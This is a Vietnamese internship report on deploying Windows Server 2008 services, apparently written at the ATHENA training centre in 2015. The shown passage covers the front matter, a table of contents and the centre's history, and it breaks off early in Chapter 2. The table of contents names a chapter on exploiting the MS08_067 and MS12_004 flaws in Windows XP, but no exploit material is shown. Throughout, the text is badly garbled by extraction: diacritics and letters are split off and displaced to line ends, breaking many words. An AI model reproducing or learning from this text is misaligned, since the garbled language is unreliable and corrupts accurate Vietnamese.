Embed Size (px)
Citation preview
TR NG Đ I H C CÔNG NGHI P TPHCM – KHOA CNTTƯỜ Ạ Ọ ỆTRUNG TÂM ĐÀO T O QU N TR M NG VÀ Ạ Ả Ị Ạ
AN NINH M NG QU C T ATHENAẠ Ố Ế
----------
BÁO CÁO TH C T P T T NGHI PỰ Ậ Ố Ệ
NGHIÊN C U VÀ TRI N KHAI CÁC D CH V TRÊNỨ Ể Ị Ụ
WINDOWS SERVER 2008
GVHD: VÕ Đ TH NGỖ ẮSVTT: NGUY N AN HUYỄMSSV: 12119401L P:Ớ NCTH6BĐCTT: 92 NGUY N ĐÌNH CHI U,Ễ Ể
P.ĐA KAO, QU N 1, TPHCMẬ
TPHCM, Tháng 05 năm 2015
L I C M NỜ Ả Ơ
Trên th c t không có s thành công nào mà không g n li n v i nh ng s hự ế ự ắ ề ớ ữ ự ỗ
tr , giúp đ dù ít hay nhi u, dù tr c ti p hay gián ti p c a ng i khác. Trongợ ỡ ề ự ế ế ủ ườ
su t th i gian t khi b t đ u h c t p gi ng đ ng đ n nay, em đã nh nố ờ ừ ắ ầ ọ ậ ở ả ườ ế ậ
đ c r t nhi u s quan tâm, giúp đ c a quý Th y Cô, gia đình và b n bè. V iượ ấ ề ự ỡ ủ ầ ạ ớ
l i bi t n sâu s c nh t, em xin g i đ n quý ờ ế ơ ắ ấ ử ế th y côầ Khoa Công Ngh Thôngệ
Tin – Tr ng đ i h c Công nghi p TPHCMườ ạ ọ ệ đã cùng v i tri th c và tâm huy tớ ứ ế
c a mình đ truy n đ t v n ki n th c quý báu cho chúng em trong su t th iủ ể ề ạ ố ế ứ ố ờ
gian h c t p t i tr ng. Và đ c bi t, trong h c kỳ này Khoa đã t ch c choọ ậ ạ ườ ặ ệ ọ ổ ứ
chúng em th c t p và đ c ti p c n v i môn h c mà theo em là r t h u íchự ậ ượ ế ậ ớ ọ ấ ữ
đ i v i sinh viên ngành Công Ngh Thông Tin.ố ớ ệ
Em xin chân thành c m n Th y Võ Đ Th ng đã h ng d n chúng em th cả ơ ầ ỗ ắ ướ ẫ ự
t p t i Trung Tâm ATHENA cũng nh nh ng bu i nói chuy n, th o lu n. N uậ ạ ư ữ ổ ệ ả ậ ế
không có nh ng l i h ng d n th y thì em nghĩ bài báo cáo này c a em r tữ ờ ướ ẫ ầ ủ ấ
khó có th hoàn thi n đ c. M t l n n a, em xin chân thành c m n th y.ể ệ ượ ộ ầ ữ ả ơ ầ
Bài báo cáo đ c th c hi n trong kho ng th i gian g n ượ ự ệ ả ờ ầ 2 tháng. B c đ u điướ ầ
vào th c t , tìm hi u, ki n th c c a em còn h n ch và còn nhi u b ng . Doự ế ể ế ứ ủ ạ ế ề ỡ ỡ
v y, không tránh kh i nh ng thi u sót là đi u ch c ch n, em r t mong nh nậ ỏ ữ ế ề ắ ắ ấ ậ
đ c nh ng ý ki n đóng góp quý báu c a quý Th y Cô và các b n h c cùngượ ữ ế ủ ầ ạ ọ
l p đ ki n th c c a em trong lĩnh v c này đ c hoàn thi n h n.ớ ể ế ứ ủ ự ượ ệ ơ
Sau cùng, em xin kính chúc quý th y cô ầ khoa CNTT Tr ng ĐH Công nghi pườ ệ
TPHCM và th y Võ Đ Th ng th t d i dào s c kh e, ni m tin đ ti p t c th cầ ỗ ắ ậ ồ ứ ỏ ề ể ế ụ ự
hi n s m nh cao đ p c a mình là truy n đ t ki n th c cho th h mai sau.ệ ứ ệ ẹ ủ ề ạ ế ứ ế ệ
Trân tr ngọ
NH N XÉT C A Đ N V TH C T PẬ Ủ Ơ Ị Ự Ậ
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
Tp.HCM, ngày …. Tháng ….. năm 2015
Xác nh n c a ĐVTTậ ủ
NH N XÉT C A GIÁO VIÊN H NG D NẬ Ủ ƯỚ Ẫ
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
.....................................................................................................................................................................
TP.HCM, Ngày ….. Tháng ….. Năm 2015
Xác nh n c a GVHDậ ủ
L I M Đ UỜ Ở Ầ
Ngày nay v i s phát tri n c a khoa h c kỹ thu t thì máy tính tr nên phớ ự ể ủ ọ ậ ở ổ
bi n v i m i ng i. Chúng mang l i cho con ng i kh năng to l n và làmế ớ ọ ườ ạ ườ ả ớ
nh ng công vi c phi th ng: tính toán nhanh và chính xác các bài toán ph cữ ệ ườ ứ
t p, đi u khi n t đ ng, gi i trí… Máy tính ra đ i không ch h tr trong s nạ ề ể ự ộ ả ờ ỉ ỗ ợ ả
xu t mà còn trong vi c h c t p và làm góp ph n gi i phóng s c lao đ ng. ấ ệ ọ ậ ầ ả ứ ộ
Bên c nh s phát tri n chóng m t c a máy tính trong th i bu i công nghạ ự ể ặ ủ ờ ổ ệ
thông tin thì các ng d ng, d ch v m ng là n n t n không th tách r i. S cứ ụ ị ụ ạ ề ả ể ờ ứ
m nh máy tính có th nhân lên g p nhi u l n khi đ c k t n i thành m ngạ ể ấ ề ầ ượ ế ố ạ
máy tính. Là c s h t ng cho phép trao đ i thông tin, truy n t i d li u t xaơ ở ạ ầ ổ ề ả ữ ệ ừ
nh m rút ng n kho ng cách. V i m ng máy tính toàn c u chúng ta d dàngằ ắ ả ớ ạ ầ ễ
ti p c n v i s phát tri n c a th gi i trong đó có s phát tri n g n nh t c aế ậ ớ ự ể ủ ế ớ ự ể ầ ấ ủ
Windows Server là Windows Server 2000 và Windows Server 2003 và ti pế
đ n là Windows Server 2008 h tr t t các d ch v m ng c n thi t trênế ỗ ợ ố ị ụ ạ ầ ế
Server, vi c c i ti n không ng ng giúp nâng cao tính n đ nh và an toàn h nệ ả ế ừ ổ ị ơ
cho Windows Server 2008 ho t đ ng m t cách tr n tru.ạ ộ ộ ơ
Hi n nay quá trình công nghi p hóa hi n đ i hóa đ t n c là m t ch tr ngệ ệ ệ ạ ấ ướ ộ ủ ươ
hàng đ u c a nhà n c. M ng máy tính tr thành m c tiêu nghiên c u và phátầ ủ ướ ạ ở ụ ứ
tri n. C t lõi là ngành công ngh thông tin bao g m nhi u lĩnh v c t ki nể ố ệ ồ ề ự ừ ế
trúc m ng đ n nguyên lý thi t k , cài đ t mô hình ng d ng v.v… M ng vi nạ ế ế ế ặ ứ ụ ạ ễ
thông nói chung và m ng máy tính trên n n t ng WS 2008 nói riêng là công cạ ề ả ụ
h u d ng không th thi u trong b máy nhà n c, tr ng h c, doanhữ ụ ể ế ộ ướ ườ ọ
nghi p… Nó đóng vai trò là c u n i trao đ i thông tin gi a các chính ph , tệ ầ ố ổ ữ ủ ổ
ch c xã h i và m i ng i v i nhau.ứ ộ ọ ườ ớ
Qua th i gian h c t p và nghiên c u trên gh nhà tr ng cùng v i s h trờ ọ ậ ứ ế ườ ớ ự ỗ ợ
t n tình c a Th y cô, b n bè và ng i thân đã giúp em thu th p đ c nhi uậ ủ ầ ạ ườ ậ ượ ề
ki n th c quý báo. Đ c bi t là quá trình th c t p t i Trung tâm ATHENA giúpế ứ ặ ệ ự ậ ạ
em có nh ng tr i nghi m vô cùng thú v và b ích. V i mong mu n tìm hi u vữ ả ệ ị ổ ớ ố ể ề
m ng máy tính và góp ph n xây d ng m t m ng máy tính thân thi n, thôngạ ầ ự ộ ạ ệ
minh cho m i ng i s d ng.ọ ườ ử ụ
Tuy đã có nhi u c g ng song không th tránh nh ng khuy t đi m, sai sót vìề ố ắ ể ữ ế ể
th mong đ c s thông c m và nh ng ý ki n đóng góp quý báo t Quý Th yế ượ ự ả ữ ế ừ ầ
Cô, b n bè, ng i thân đ em có th ngày m t hoàn thi n b n thân mình h n. ạ ườ ể ể ộ ệ ả ơ
Xin chân thành c m n.ả ơ
M C L CỤ Ụ
Ch ng 1 T NG QUAN V TRUNG TÂM ATHENAươ Ổ Ề ....................................................1
1. Gi i thi u v trung tâmớ ệ ề .............................................................................................................1
2. Quá trình hình thành và phát tri n .ể .....................................................................................2
2.1. Quá trình hình thành..........................................................................................2
2.2. Quá trình phát triển............................................................................................3
3. C c u t ch cơ ấ ổ ứ ...............................................................................................................................4
4. Tình hình ho t đ ng trong nămạ ộ .............................................................................................4
4.1. Cơ cấu sản phẩm................................................................................................4
4.2. Các sản phẩm khác............................................................................................5
5. C s h t ngơ ở ạ ầ .................................................................................................................................5
6. Các d ch v h tr :ị ụ ỗ ợ .......................................................................................................................5
7. Khách hàng......................................................................................................................................6
8. Đ i tácố ................................................................................................................................................6
Ch ng 2 NÔI DUNG TH C T P.ươ Ự Ậ ....................................................................................7
1. Nhi m v đ c giao.ệ ụ ượ ...................................................................................................................7
2. Ki n th c tìm hi uế ứ ể .......................................................................................................................7
2.1. Giải pháp mạng doanh nghiệp...........................................................................7
2.2. Các thành phần công nghệ trong mạng doanh nghiệp.......................................7
3. Windows Server 2008................................................................................................................7
Ch ng 3 T NG QUAN V WINDOWS SERVER 2008ươ Ổ Ề ...........................................10
1. GI I THI U WINDOWS SERVER 2008Ớ Ệ ............................................................................10
2. CÁC TÍNH NĂNG C A WINDOWS SERVER 2008Ủ ........................................................10
2.1. Công cụ quản trị Server Manager....................................................................10
2.2. Windows Server Core......................................................................................11
2.3. PowerShell.......................................................................................................11
2.4. Windows Deloyment Services.........................................................................12
2.5. Terminal Services............................................................................................12
2.6. Network Access Protection.............................................................................12
2.7. Read-Only Domain Controllers.......................................................................13
2.8. Công nghệ Failover Clustering........................................................................13
2.9. Windows Firewall with Advance Security......................................................13
3. M T S TÍNH NĂNG M I C A WINDOWS SERVER 2008Ộ Ố Ớ Ủ ....................................14
3.1. Công nghệ ảo hóa Hyper-V.............................................................................14
3.2. Processor Compatibility Mode........................................................................14
3.3. File Classification Infrastructure.....................................................................14
3.4. Quản lý trong ỗ đĩa và file:..............................................................................14
3.5. Cải tiến giao thức và mã hóa...........................................................................15
3.6. Một số tính năng khác.....................................................................................15
4. CÁC L I ÍCH C A WINDOWS SERVER 2008Ợ Ủ ................................................................15
4.1. Web..................................................................................................................15
4.2. Ảo hóa :...........................................................................................................16
4.3. Bảo mật:...........................................................................................................16
4.4. Network Access Protection (NAP):.................................................................16
4.5. Read-Only Domain Controller (RODC):........................................................16
4.6. BitLocker:........................................................................................................16
4.7. Windows Firewall:..........................................................................................17
5. CÁC PHIÊN B N C A WINDOWS SERVER 2008Ả Ủ ........................................................17
5.1. Windows Server 2008:..................................................................................17
5.2. Windows Server 2008 Standard Edition.....................................................17
5.3. Windows Server 2008 Enterprise Edition...................................................17
5.4. Windows Server 2008 Datacenter Edition..................................................18
5.5. Windows Web Server 2008...........................................................................18
Ch ng 4ươ CÀI Đ T WINDOWS SERVER 2008Ặ ..........................................................19
1. YÊU C U PH N C NGẦ Ầ Ứ ............................................................................................................19
2. CÁC CÁCH CÀI Đ TẶ ...................................................................................................................19
3. NÂNG C P LÊN WINDOWS SERVER 2008Ấ .....................................................................19
4. CÀI Đ T WINDOWS SERVER 2008Ặ ....................................................................................20
Ch ng 5 D NG DOMAIN CONTROLLERươ Ự ..................................................................25
Ch ng 6ươ JOIN DOMAIN..................................................................................................33
Ch ng 7 TRI N KHAI CÁC D CH V M NGươ Ể Ị Ụ Ạ ...........................................................35
1. D CH V DNSỊ Ụ ...............................................................................................................................35
1.1. Giới thiệu về DNS...........................................................................................35
1.2. Cài đặt DNS.....................................................................................................35
1.3. Cấu hình DNS..................................................................................................36
2. GI I THI U D CH V DHCPỚ Ệ Ị Ụ ................................................................................................41
2.1. Hoạt động của giao thức..................................................................................41
2.2. Cài đặt DHCP trên windows server 2008........................................................41
2.3. Cấu hình DHCP...............................................................................................45
Ch ng 8 TRI N KHAI VPNươ Ể ...........................................................................................48
1. Tìm hi u VPNể ...............................................................................................................................48
1.1. Khái niệm........................................................................................................48
1.2. Các loại VPN...................................................................................................49
1.3. Bảo mật trong VPN.........................................................................................50
1.4. Sản phẩm công nghệ dành cho VPN...............................................................51
1.5. Bộ xử lý trung tâm VPN..................................................................................51
1.6. Router dùng cho VPN.....................................................................................51
1.7. Tường lửa PIX của Cisco................................................................................51
2. VPN SITE TO SITE......................................................................................................................52
2.1. Chuẩn bị:.........................................................................................................52
2.2. Đặt IP cho 4 máy.............................................................................................52
2.3. Tiến hành cấu hình trên 2 server.....................................................................53
2.4. Kiểm tra...........................................................................................................62
Ch ng 9 MAIL TRÊN VPS.ươ .............................................................................................63
1. Cài đ t MDmoon v10ặ ................................................................................................................63
2. C u hình MDmoon v10.ấ ...........................................................................................................63
Ch ng 10 CH NG 10: B O M T WINDOWS.ươ ƯƠ Ả Ậ ....................................................75
1. Khai thác l h ng trên Windows XP v i mã l i MS08_067ỗ ổ ớ ỗ .....................................75
2. Khai thác l h ng trên Windows XP v i mã l i MS12_004ỗ ổ ớ ỗ .....................................77
Ch ng 11 K T LU Nươ Ế Ậ .....................................................................................................83
1. Các k t qu đ t đ c:ế ả ạ ượ .............................................................................................................83
2. Kinh nghi m th c tệ ự ế................................................................................................................83
3. Hoàn thi n b n thânệ ả .................................................................................................................83
4. Các ki n th c đ c lĩnh h iế ứ ượ ộ ..................................................................................................83
5. K t lu n.ế ậ .........................................................................................................................................84
Ch ng 1 ươ
T NG QUAN V TRUNG TÂM ATHENAỔ Ề
1. Giới thiệu về trung tâm
Trung Tâm Đào T o Qu n Tr M ng và An Ninh M ng Qu c T ATHENA_Ti nạ ả ị ạ ạ ố ế ề
thân là Công ty TNHH T v n và Đào t o qu n tr m ng Vi t Năng, (ư ấ ạ ả ị ạ ệ tên
th ng hi u vi t t t làươ ệ ế ắ TRUNG TÂM ĐÀO T O ATHENAẠ ), đ c chính th cượ ứ
thành l p theo gi y phép kinh doanh ậ ấ s 4104006757 c a S K Ho ch Đ uố ủ ở ế ạ ầ
T Tp H Chí Minh c p ngày 04 tháng 11 năm 2008.ư ồ ấ
Tên công ty vi t b ng ti ng n c ngoài:ế ằ ế ướ ATHENA ADVICE TRAINING
NETWORK SECURITY COMPANY LIMITED
ATHENA là m t t ch c quy t nhi u trí th c tr Vi t Nam đ y năng đ ng,ộ ổ ứ ụ ề ứ ẻ ệ ầ ộ
nhi t huy t và kinh nghi m trong lĩnh v c công ngh thông tin. V i quy t tâmệ ế ệ ự ệ ớ ế
góp ph n vào công cu c thúc đ y ti n trình tin h c hóa c a n c nhà.ầ ộ ẩ ế ọ ủ ướ
ATHENA đã và đang t p trung ch y u vào các h at đ ng sau: ậ ủ ế ọ ộ
Công tác hu n luy n, qu ng bá ki n th c tin h c, đ c bi t trong lĩnh v cấ ệ ả ế ứ ọ ặ ệ ự
m ng máy tính, internet, b o m t và th ng m i đi n t …. ạ ả ậ ươ ạ ệ ử
T v n và h tr cho doanh nghi p ng d ng hi u qu tin h c vào ho tư ấ ổ ợ ệ ứ ụ ệ ả ọ ạ
đ ng s n xu t kinh doanh. ộ ả ấ
Cung c p ngu n nhân l c trong lĩnh v c công ngh thông tin, đ c bi t làấ ồ ự ự ệ ặ ệ
chuyên gia v m ng máy tính và b o m t m ng đ t trình đ qu c t choề ạ ả ậ ạ ạ ộ ố ế
các t ch c, doanh nghi p có nhu c u. ổ ứ ệ ầ
Ti n hành các ho t đ ng nghiên c u nâng cao ki n th c tin h c và phátế ạ ộ ứ ế ứ ọ
tri n c s d li u thông tin v các ng d ng và s c m ng. ể ơ ở ữ ệ ề ứ ụ ự ố ạ
Ti n hành các d ch v ng c u kh n c p cho doanh nghi p trong tr ngế ị ụ ứ ứ ẩ ấ ệ ườ
h p x y ra s c máy tính. ợ ả ự ố
Tr s và các chi nhánhụ ở c a trung tâm Athenaủ
Tr s chính: ụ ở
Trung Tâm Đào T o Qu n Tr M ng và An Ninh M ng Qu c T THENA ạ ả ị ạ ạ ố ế
Đ a ch : 92 Nguy n Đình Chi u , P.Đa Kao, Qu n 1, Tp H Chí Minh.ị ỉ ễ ể ậ ồ
Website: www.Athena.Edu.Vn
Đi n tho i: ( 84-8 ) 2210 3801 - Hotline: 0943 20 00 88ệ ạ
1
C s 2_T i TP H Chí Minhơ ở ạ ồ :
Trung Tâm Đào T o Qu n Tr M ng và An Ninh M ng Qu c T THENAạ ả ị ạ ạ ố ế
Đ a ch : S 2 Bis Đinh Tiên Hoàng, P.Đa Kao, Qu n 1, Tp H Chí Minh. ị ỉ ố ậ ồ
Website: www.athena.com.vn
Đi n tho i: ( 84-8 ) 3824 4041 - Hotline: 0943 23 00 99 ệ ạ
Chi nhánh Nha Trang
Đi n tho i : 08. 3824 4041ệ ạ - Fax: 08. 39 111 692
Website: www.athena.edu.vn
Email : [email protected]
2. Quá trình hình thành và phát triển .
2.1. Quá trình hình thành.
Năm 2000, m t nhóm các thành viên là nh ng doanh nhân tài năng và thànhộ ữ
công trong lĩnh v c công ngh thông tin đã nh n ra ti m năng phát tri n c aự ệ ậ ề ể ủ
vi c đào t o n n công ngh thông tin n c nhà. H là nh ng cá nhân có trìnhệ ạ ề ệ ướ ọ ữ
đ chuyên môn cao và có đ u óc lãnh đ o cùng v i t m nhìn xa v t ng laiộ ầ ạ ớ ầ ề ươ
c a ngành công ngh thông tin trong t ng lai, h đã quy t đ c m t l củ ệ ươ ọ ụ ượ ộ ự
l ng l n đ i ngũ công ngh thông tin tr c h t là làm nhi m v ng c uượ ớ ộ ệ ướ ế ệ ụ ứ ứ
máy tính cho các doanh nghi p, cá nhân có nhu c u. B c phát tri n ti p theoệ ầ ướ ể ế
là v n t m đào đ o đ i ngũ cán b công ngh thông tin cho đ t n c và xãươ ầ ạ ộ ộ ệ ấ ướ
h i. ộ
Các thành viên sáng l p trung tâm g m: ậ ồ
Ông Nguy n Th Đông: C u giám đ c trung tâm ng c u máy tính Athena,ễ ế ự ố ứ ứ
hi n t i là giám đ c d án c a công ty Siemen Telecom. ệ ạ ố ự ủ
Ông H a Văn Th Phúc: Phó Giám đ c Phát tri n Th ng m i Công ty EIS, Phóứ ế ố ể ươ ạ
T ng công ty FPT. ổ
Ông Nghiêm Sỹ Th ng: Phó T ng giám đ c Ngân hàng Liên Vi t, ch u tráchắ ổ ố ệ ị
nhi m công ngh thông tin c a Ngân hàng. ệ ệ ủ
Ông Võ Đ Th ng: Hi n đang là giám đ c Trung tâm đào t o qu n tr và anỗ ắ ệ ố ạ ả ị
ninh m ng Athena. ạ
2
Đ n năm 2003, b n thành viên sáng l p cùng v i v i đ i ngũ ng c u máyế ố ậ ớ ớ ộ ứ ứ
tính g n 100 thành viên ho t đ ng nh là m t nhóm, m t t ch c ng c uầ ạ ộ ư ộ ộ ổ ứ ứ ứ
máy tính mi n Nam. ề
Công ty TNHH T v n và Đào t o qu n tr m ng Vi t Năng, hay còn g i làư ấ ạ ả ị ạ ệ ọ
Trung tâm đào t o Qu n tr và An ninh m ng Qu c T Athena (ạ ả ị ạ ố ế tên th ngươ
hi u vi t t t làệ ế ắ TRUNG TÂM ĐÀO T O ATHENAẠ ), đ c chính th c thành l pượ ứ ậ
theo gi y phép kinh doanh ấ s 4104006757 c a S K Ho ch Đ u T Tp Hố ủ ở ế ạ ầ ư ồ
Chí Minh c p ngày 04 tháng 11 năm 2008.ấ
2.2. Quá trình phát triển
T năm 2004- 2006: Trung tâm có nhi u b c phát tri n và chuy n mình.ừ ề ướ ể ể
Trung tâm tr thành m t trong nh ng đ a ch tin c y c a nhi u doanh nghi pở ộ ữ ị ỉ ậ ủ ề ệ
nh m cài đ t h th ng an ninh m ng và đào t o cho đ i ngũ nhân viên c a cácằ ặ ệ ố ạ ạ ộ ủ
doanh nghi p v các ch ng trình qu n lý d án MS Project 2003, kỹ năngệ ề ươ ả ự
th ng m i đi n t , b o m t web… và là đ a ch tin c y c a nhi u h cươ ạ ệ ử ả ậ ị ỉ ậ ủ ề ọ
sinh_sinh viên đ n đăng kí h c. Đòi h i c p thi t trong th i gian này c aế ọ ỏ ấ ế ờ ủ
Trung tâm là nâng cao h n n a đ i ngũ gi ng viên cũng nh c s đ đáp ngơ ữ ộ ả ư ơ ở ể ứ
nhu c u ngày càng cao v công ngh thông tin c a đ t n c nói chung, cácầ ề ệ ủ ấ ướ
doanh nghi p, cá nhân nói riêng. ệ
Đ n năm 2006: Trung tâm đào t o qu n tr và an ninh m ng Athena m raế ạ ả ị ạ ở
thêm m t chi nhánh t i C xá Nguy n Văn Tr i. Đ ng th i ti p t c tuy nộ ạ ư ễ ỗ ồ ờ ế ụ ể
d ng đ i ngũ gi ng viên là nh ng chuyên gia an ninh m ng t t nghi p cácụ ộ ả ữ ạ ố ệ
tr ng đ i h c và h c vi n công ngh thông tin uy tín trên toàn qu c, đ ngườ ạ ọ ọ ệ ệ ố ồ
th i trong th i gian này Athena có nhi u chính sách u đãi nh m thu hút đ iờ ờ ề ư ằ ộ
ngũ nhân l c công ngh thông tin lành ngh t các doanh nghi p, t ch c, làmự ệ ề ừ ệ ổ ứ
giàu thêm đ i ngũ gi ng viên c a trung tâm. ộ ả ủ
Đ n năm 2008: Hàng lo t các trung tâm đào t o qu n tr và an ninh m ng m cế ạ ạ ả ị ạ ọ
lên, cùng v i kh ng ho ng kinh t tài chính toàn c u đã làm cho Trung tâm r iớ ủ ả ế ầ ơ
vào nhi u khó khăn. Ông Nguy n Th Đông cùng Ông H a Văn Th Phúc rútề ễ ế ứ ế
v n kh i công ty gây nên s hoang man cho toàn b h th ng trung tâm. C ngố ỏ ự ộ ệ ố ộ
thêm chi nhánh t i C xã Nguy n Văn Tr i ho t đ ng không còn hi u quạ ư ễ ỗ ạ ộ ệ ả
ph i đóng c a làm cho trung tâm r i t khó khăn này đ n khó khăn khác. ả ử ơ ừ ế
3
Lúc này, v i quy t tâm khôi ph c l i công ty cũng nh ti p t c s m ng gópớ ế ụ ạ ư ế ụ ứ ạ
ph n vào ti n trình tin h c hóa c a đ t n c. Ông Võ Đ Th ng mua l i cầ ế ọ ủ ấ ướ ỗ ắ ạ ổ
ph n c a hai nhà đ u t lên làm giám đ c và xây d ng l i trung tâm. Đây làầ ủ ầ ư ố ự ạ
m t b c chuy n mình có ý nghĩa chi n l c c a trung tâm. M ra m t làn gióộ ướ ể ế ượ ủ ở ộ
m i và m t giai đo n m i, cùng v i quy t tâm m nh mẽ và m t tinh th n thépớ ộ ạ ớ ớ ế ạ ộ ầ
đã giúp ông Th ng v t qua nhi u khó khăn ban đ u, giúp trung tâm đ ngắ ượ ề ầ ứ
v ng trong th i kì kh ng ho ng. ữ ờ ủ ả
T năm 2009 – nay: Cùng v i s lãnh đ o tài tình và đ u óc chi n l c. Trungừ ớ ự ạ ầ ế ượ
tâm đào t o qu n tr và an ninh m ng d n đ c ph c h i và tr l i quỹ đ oạ ả ị ạ ầ ượ ụ ồ ở ạ ạ
ho t đ ng c a mình. Đ n nay, Trung tâm đã tr thành m t trong nh ng trungạ ộ ủ ế ở ộ ữ
tâm đào t o qu n tr m ng hàng đ u Vi t Nam. Cùng v i s liên k t c a r tạ ả ị ạ ầ ệ ớ ự ế ủ ấ
nhi u công ty, t ch c doanh nghi p, trung tâm tr thành n i đào t o và cungề ổ ứ ệ ở ơ ạ
c p ngu n nhân l c công ngh thông tin cho xã h i. T ng b c th c hi nấ ồ ự ệ ộ ừ ướ ự ệ
m c tiêu góp ph n vào ti n trình tin h c hóa n c nhà. ụ ầ ế ọ ướ
3. Cơ cấu tổ chức
Hình 1: S đ t ch c công tyơ ồ ổ ứ
4. Tình hình hoạt động trong năm
4.1. Cơ cấu sản phẩm.
4.1.1. Các khóa học dài hạn
4
– Ch ng trình đào t o chuyên gia an ninh m ng. ( AN2S) Athena networkươ ạ ạ
security specialist.
– Ch ng trình Qu n tr viên an ninh m ng (ANST) Athena netuworkươ ả ị ạ
security Technician.
– Chuyên viên qu n tr m ng nâng cao (ANMA) Athena network managerả ị ạ
Administrator.
4.1.2. Các khóa h c ng n h nọ ắ ạ
Khóa Qu n tr m ngả ị ạ
– Qu n tr m ng Microsoft căn b n ACBN ả ị ạ ả
– Ph n c ng máy tính, laptop, server ầ ứ
– Qu n tr h th ng m ng Microsoft MCSA Security.ả ị ệ ố ạ
– Qu n tr m ng Microsoft nâng cao MCSEả ị ạ
– Qu n tr window Vista ả ị
– Qu n tr h th ng Window Server 2003:2008ả ị ệ ố
– L p Master Exchange Mail Serverớ
– Qu n tr m ng qu c t Cissco CCNAả ị ạ ố ế
– Qu n tr h th ng m ng Linux 1 và Linux 2. ả ị ệ ố ạ
Khóa thi t k web và b o m t m ngế ế ả ậ ạ .
– Xây d ng, qu n tr web th ng m i đi n t v i Joomla và VirtuMartự ả ị ươ ạ ệ ử ớ
– L p trình web v i Php và MySQLậ ớ
– B o m t m ng qu c t ACNSả ậ ạ ố ế
– Hacker mũ tr ng ắ
– Athena Mastering Firewall Security
– B o m t website. ả ậ
4.2. Các sản phẩm khác.
– Chuyên đ th c hành sao l u và ph c h i d li uề ự ư ụ ồ ữ ệ
– Chuyên đ th c hành b o m t m ng Wi_Fiề ự ả ậ ạ
– Chuyên đ Ghost qua m ngề ạ
– Chuyên đ xây d ng và qu n tr di n đànề ự ả ị ễ
– Chuyên đ b o m t d li u phòng ch ng n i giánề ả ậ ữ ệ ố ộ
5
– Chuyên đ qu n lý tài s n công ngh thông tin ề ả ả ệ
– Chuyên đ kỹ năng th ng m i đi n t . ề ươ ạ ệ ử
5. Cơ sở hạ tầng
– Thi t b đ y đ và hi n đ i.ế ị ầ ủ ệ ạ
– Ch ng trình c p nh t liên t c, b o đ m h c viên luôn ti p c n v iươ ậ ậ ụ ả ả ọ ế ậ ớ
nh ng công ngh m i nh t.ữ ệ ớ ấ
– Phòng máy r ng rãi, thoáng mát.ộ
6. Các dịch vụ hỗ trợ:
– Đ m b o vi c làm cho h c viên t t nghi p khoá dài h nả ả ệ ọ ố ệ ạ
– Gi i thi u vi c làm cho m i h c viênớ ệ ệ ọ ọ
– Th c t p có l ng cho h c viên khá gi iự ậ ươ ọ ỏ
– Ngoài gi h c chính th c, h c viên đ c th c hành thêm mi n phí,ờ ọ ứ ọ ượ ự ễ
không gi i h n th i gianớ ạ ờ
– H tr kỹ thu t không th i h n trong t t c các lĩnh v c liên quan đ nỗ ợ ậ ờ ạ ấ ả ự ế
máy tính, m ng máy tính, b o m t m ngạ ả ậ ạ
– H tr thi Ch ng ch Qu c t .ỗ ợ ứ ỉ ố ế
7. Khách hàng
– M i đ i t ng chuyên ho c không chuyên v CNTT.ọ ố ượ ặ ề
– Khách hàng ch y u c a ủ ế ủ ATHENAlà các b n h c sinh, sinh viên và các cánạ ọ
b công nhân viên ch c yêu thích lĩnh v c công ngh thông tin.ộ ứ ự ệ
8. Đối tác
Trung tâm đào t o an ninh m ng ATHENA là đ i tác đào t o & cung c pạ ạ ố ạ ấ
nhân s CNTTự , qu n tr m ngả ị ạ , an ninh m nạ g ch t l ng cao theo đ n đ tấ ượ ơ ặ
hàng cho các đ n v nh ngân hàng, doanh nghi p, các c quan chính ph , tơ ị ư ệ ơ ủ ổ
ch c tài chính. ứ
–
6
Ch ng 2 ươ
NÔI DUNG TH C T P.Ự Ậ
1. Nhi m v đ c giaoệ ụ ượ .
Nghiên c u các d ch v m ng trên Windows Server 2008ứ ị ụ ạ
Tri n khai các d ch v m ng trên Windows Server 2008ể ị ụ ạ
2. Ki n th c tìm hi uế ứ ể
2.1. Giải pháp mạng doanh nghiệp
2.1.1. Giới thiệu về mạng doanh nghiệp
H th ng m ng c a doanh nghi p đ n gi n hay ph c t p là tùy theo quy môệ ố ạ ủ ệ ơ ả ứ ạ
và lo i hình c a doanh nghi p. Ngày nay, các nhà cung ng đã đ a ra r tạ ủ ệ ứ ư ấ
nhi u s ch n l a cho doanh nghi p nh cho phép doanh nghi p t trang b ,ề ự ọ ự ệ ư ệ ự ị
t qu n lý ho c s d ng d ch v . Nh ng doanh nghi p l n v i hàng ngànự ả ặ ử ụ ị ụ ữ ệ ớ ớ
máy tính cũng có nh ng gi i pháp qu n lý đ c thù k t h p c ph n c ng vàữ ả ả ặ ế ợ ả ầ ứ
ph n m m.ầ ề
H u h t các doanh nghi p đ u có nhu c u s d ng các ng d ng công nghầ ế ệ ề ầ ử ụ ứ ụ ệ
thông tin (CNTT) nh ng m c đ khác nhau. Do v y, h sẽ có nh ng nhuở ữ ứ ộ ậ ọ ữ
c u khác nhau v qu n tr h th ng m ng (network) c a doanh nghi p. M tầ ề ả ị ệ ố ạ ủ ệ ộ
h th ng đ c ki m soát t t sẽ làm gi m đáng k chi phí ho t đ ng, nângệ ố ượ ể ố ả ể ạ ộ
cao hi u qu cũng nh đ tin c y c a h th ng. ệ ả ư ộ ậ ủ ệ ố
2.2. Các thành phần công nghệ trong mạng doanh nghiệp
Tùy vào qui mô l n hay nh c a doanh nghi p mà ta sẽ có nh ng gi i phápớ ỏ ủ ệ ữ ả
công ngh và thi t k sao cho phù h p nh t.ệ ế ế ợ ấ
Hi n nay, h u h t các ng d ng m i đ u yêu c u r t nhi u tài nguyên c aệ ầ ế ứ ụ ớ ề ầ ấ ề ủ
h th ng và băng thông m ng, cũng nh các yêu c u v đi u khi n, giám sátệ ố ạ ư ầ ề ề ể
